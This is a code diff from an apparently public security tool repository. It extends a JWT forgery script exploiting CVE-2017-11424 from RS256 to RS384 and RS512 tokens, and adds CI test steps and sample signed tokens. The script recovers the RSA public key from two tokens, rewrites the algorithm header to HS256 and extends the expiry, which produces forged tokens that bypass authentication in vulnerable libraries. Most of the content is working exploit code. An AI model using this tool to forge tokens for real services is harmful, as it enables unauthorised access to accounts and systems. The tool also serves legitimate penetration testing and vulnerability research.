Merge pull request #4 from silentsignal/josh_test

Add support for RS384 and RS512 both in code and tests

.github/workflows/test-docker.yml

@@ -27,7 +27,19 @@ jobs:
         python -m pip install --upgrade pip
         pip install PyJWT==1.5.0
 
-    - name: Run test with CVE-2017-11424
+    - name: Run RS256 test with CVE-2017-11424
       run: |
-        docker run rsa_sig2n python3 jwt_forgery.py `cat  ./CVE-2017-11424/test_jwt/RS256/jwt0` `cat  ./CVE-2017-11424/test_jwt/RS256/jwt1` | egrep '^eyJ' | tee CVE-2017-11424.tokens
-        ./test_scripts/test_CVE-2017-11424.sh CVE-2017-11424.tokens
+        docker run rsa_sig2n python3 jwt_forgery.py `cat  ./CVE-2017-11424/test_jwt/RS256/jwt0` `cat  ./CVE-2017-11424/test_jwt/RS256/jwt1` | egrep '^eyJ' | tee CVE-2017-11424_RS256.tokens
+        ./test_scripts/test_CVE-2017-11424.sh CVE-2017-11424_RS256.tokens
+
+    - name: Run RS384 test with CVE-2017-11424
+      run: |
+        docker run rsa_sig2n python3 jwt_forgery.py `cat  ./CVE-2017-11424/test_jwt/RS384/jwt0` `cat  ./CVE-2017-11424/test_jwt/RS384/jwt1` | egrep '^eyJ' | tee CVE-2017-11424_RS384.tokens
+        ./test_scripts/test_CVE-2017-11424.sh CVE-2017-11424_RS384.tokens
+    
+    - name: Run RS512 test with CVE-2017-11424
+      run: |
+        docker run rsa_sig2n python3 jwt_forgery.py `cat  ./CVE-2017-11424/test_jwt/RS512/jwt0` `cat  ./CVE-2017-11424/test_jwt/RS512/jwt1` | egrep '^eyJ' | tee CVE-2017-11424_RS512.tokens
+        ./test_scripts/test_CVE-2017-11424.sh CVE-2017-11424_RS512.tokens
+
+

CVE-2017-11424/test_jwt/RS384/jwt0

@@ -0,0 +1 @@
+eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzM4NCJ9.eyJpc3MiOiJqb2UiLCJleHAiOjE2NjQ3MjIxMDMsImh0dHA6Ly9leGFtcGxlLmNvbS9pc19yb290Ijp0cnVlfQ.ZK5mfv-goo8c_9KHtMzoX2k2lVNrapSbynE-hzkWa1cJyFTxNmjpnVa1UzZW1RFiKzZu6ImLg1RCBYlbE-fCgqU7MaGrx5ZVC3HHYb3jXEvJ6a_R6LQakSywjUwN2HRtjyt0KOrUdo30K4UiDPpiOsHhlF_RF_z1Y3EeWHoZknem_5RlXYoiuhWq0VEU4-RtqCAG92Nybn3UoN4TpAvbgBHJrJq4ht9fC4zM6ODQ4QfFBfWAspW5n1knKsz729Hx4_gT-za_WEUXnPvU3LJeOagRY07zDse4pJcFBqjxWQjICRtPxyWljA893ZPFReG-QtPpWkPPAonWtIPWfcb0bg

CVE-2017-11424/test_jwt/RS384/jwt1

@@ -0,0 +1 @@
+eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzM4NCJ9.eyJpc3MiOiJqb2UiLCJleHAiOjE2NjQ3MjIxNjQsImh0dHA6Ly9leGFtcGxlLmNvbS9pc19yb290Ijp0cnVlfQ.aYhlaTnVLhskDVKw9KkBFn0I5Ooa7gNgZE0g_io3tDCwvcvhNQit9VmBkyI8G73wmWwSZkK5b4qPiVatm6q8lb2BBo26fCzERYxgJBURcoNq45e_GcT2vPeN3TOghzx3HpLTVnhcCXL4IFN4V8ue5fkwftt1KnBm5VFkGWqvJasQpsiPY4Q7czvAxHQTLD2I7E8HgIA-H_vchmKV2bME0kSnsLGhDNyNG6voTqmiPdZU7VEKYFBgoMR-gae5VL5AFqQgoaxRM7-EF-vdTHfA5YvHlWp5nwUx1SXMr45yM4U3RzDVx8p0hyTjSLnzRfyPrA9BzvIUN3PsK2dZyg8sPw

CVE-2017-11424/test_jwt/RS512/jwt0

@@ -0,0 +1 @@
+eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzUxMiJ9.eyJpc3MiOiJqb2UiLCJleHAiOjE2NjQ3MjE0NTAsImh0dHA6Ly9leGFtcGxlLmNvbS9pc19yb290Ijp0cnVlfQ.XTeo0Rf0iTgujQSHOzzTnI_3dNce1ioT0LyWILRvLLVYZvBy2Aj8tQyKElsJb8MAcKz2pxjK7tZYm2rAzugWa6ByPZItrOTarlzNgmHrC1RkmTHl-5dXBGpC4z0sM1deZFosGPKttUwk44CHzZpaHolsqpUHuYHFCJ-xB2lvnC08uSQ4M0pz8G0yNtD9WZx5ODt_m6dkjRGm3YMcNCaWDV1W9KW_fKd3uxmJvXK-otIWcmDfbBnKcfY8gWeLjdjdA-B1zSkCkWfc9ieIFEa9B3Hlui9m-b3t9pU7liogM6Ue7v6lYcDeM_UwpSeWJhdGw6FTnm2U-oRx75wobHnF0w

CVE-2017-11424/test_jwt/RS512/jwt1

@@ -0,0 +1 @@
+eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzUxMiJ9.eyJpc3MiOiJqb2UiLCJleHAiOjE2NjQ3MjE1ODQsImh0dHA6Ly9leGFtcGxlLmNvbS9pc19yb290Ijp0cnVlfQ.NWTVLpo7irGBJU27TkPmQiZiR_ybXUMxvk12a309kmhVrs3xf2dgcdIBYHHZWuLqsrXLPT2-NhFjSaVi3Xb_Ru5MTA2Tj3L5poW8bTgg_IJu5VKvH_byNcgQ4ZEUF7oaVFehnuOtNljaQZTnAEEqzaq5bEpVG-RoDs5UD1bUgFbUyWQucmEdF87KzOIWagWT-FAolNJAm0Kv0qHTr-t6-j6VueH6vYqmrRq5b_otnT8re33-k8FKCIDbr0h3gAQ3ktlxWxA9oJFjWXO7wIJezD2y0ypb8fmpENXm0j-9y6GY6Uqk57NRTBoplcYX_71Hl6vyPIiEfHhuzyI7NWBvWw

standalone/jwt_forgery.py

@@ -3,7 +3,7 @@
 import base64
 from gmpy2 import mpz,gcd,c_div
 import binascii
-from Crypto.Hash import SHA256
+from Crypto.Hash import SHA256, SHA384, SHA512
 from Crypto.Signature import PKCS1_v1_5 # god bless http://ratmirkarabut.com/articles/ctf-writeup-google-ctf-quals-2017-rsa-ctf-challenge/
 import asn1tools
 import binascii
@@ -33,7 +33,8 @@ def forge_mac(jwt0, public_key):
     jwt0_msg=b'.'.join(jwt0_parts[0:2])
 
     alg=b64urldecode(jwt0_parts[0].decode('utf8'))
-    alg_tampered=b64urlencode(alg.replace(b"RS256",b"HS256"))
+    # Always use HS256
+    alg_tampered=b64urlencode(alg.replace(b"RS256",b"HS256").replace(b"RS384", b"HS256").replace(b"RS512", b"HS256"))
 
     payload=json.loads(b64urldecode(jwt0_parts[1].decode('utf8')))
     payload['exp'] = int(time.time())+86400
@@ -57,7 +58,14 @@ def forge_mac(jwt0, public_key):
 
 if not alg0["alg"].startswith("RS") or not alg1["alg"].startswith("RS"):
     raise Exception("Not RSA signed tokens!")
-
+if alg0["alg"] == "RS256":
+    HASH = SHA256
+elif alg0["alg"] == "RS384":
+    HASH = SHA384
+elif alg0["alg"] == "RS512":
+    HASH = SHA512
+else:
+    raise Exception("Invalid algorithm")
 jwt0_sig_bytes = b64urldecode(jwt0.split('.')[2])
 jwt1_sig_bytes = b64urldecode(jwt1.split('.')[2])
 if len(jwt0_sig_bytes) != len(jwt1_sig_bytes):
@@ -67,12 +75,12 @@ def forge_mac(jwt0, public_key):
 jwt1_sig = bytes2mpz(jwt1_sig_bytes)
 
 jks0_input = ".".join(jwt0.split('.')[0:2])
-sha256_0=SHA256.new(jks0_input.encode('ascii'))
-padded0 = PKCS1_v1_5.EMSA_PKCS1_V1_5_ENCODE(sha256_0, len(jwt0_sig_bytes))
+hash_0=HASH.new(jks0_input.encode('ascii'))
+padded0 = PKCS1_v1_5.EMSA_PKCS1_V1_5_ENCODE(hash_0, len(jwt0_sig_bytes))
 
 jks1_input = ".".join(jwt1.split('.')[0:2])
-sha256_1=SHA256.new(jks1_input.encode('ascii'))
-padded1 = PKCS1_v1_5.EMSA_PKCS1_V1_5_ENCODE(sha256_1, len(jwt0_sig_bytes))
+hash_1=HASH.new(jks1_input.encode('ascii'))
+padded1 = PKCS1_v1_5.EMSA_PKCS1_V1_5_ENCODE(hash_1, len(jwt0_sig_bytes))
 
 m0 = bytes2mpz(padded0) 
 m1 = bytes2mpz(padded1)